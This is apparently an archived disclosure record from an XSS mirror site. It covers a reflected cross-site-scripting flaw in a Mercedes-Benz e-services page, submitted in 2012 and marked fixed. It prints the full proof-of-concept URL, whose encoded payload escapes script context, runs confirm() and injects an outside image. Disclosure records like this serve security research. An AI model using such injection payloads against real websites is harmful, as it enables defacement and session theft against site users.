Security researcher flexxpoint, has submitted on 28/01/2012 a cross-site-scripting (XSS) vulnerability affecting e-services.mercedes-benz.com, which at the time of submission ranked 10316 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/08/2012. It is currently fixed. |
Date submitted: 28/01/2012 |
Date published: 01/08/2012 |
Date fixed: 09/09/2013 | Status: FIXED |
Author: flexxpoint |
Domain: e-services.mercedes-benz.com |
Category: XSS |
Pagerank: 10316 |
URL: http://e-services.mercedes-benz.com/Dialog_SRQ/SRQ?subprocess=%22'--%3E%3C/style%3E%3C/script%3E%3Cs cript%3Econfirm(%22XSS-BG%22)%3C/script%3E%3Cimg%20src=http://3.bp.blogspot.com/-V7ACxkgDkMM/TjEumW6 R5AI/AAAAAAAAB3E/bAn50LGxwzs/s1600/bmw+m3+HD+Wallpaper.jpg%3E&locale=en_COM&site_locale=en_COM&toolb ar=yes&pid=mbcom_metanavigation_standard |
Click here to view the mirror
|
|
|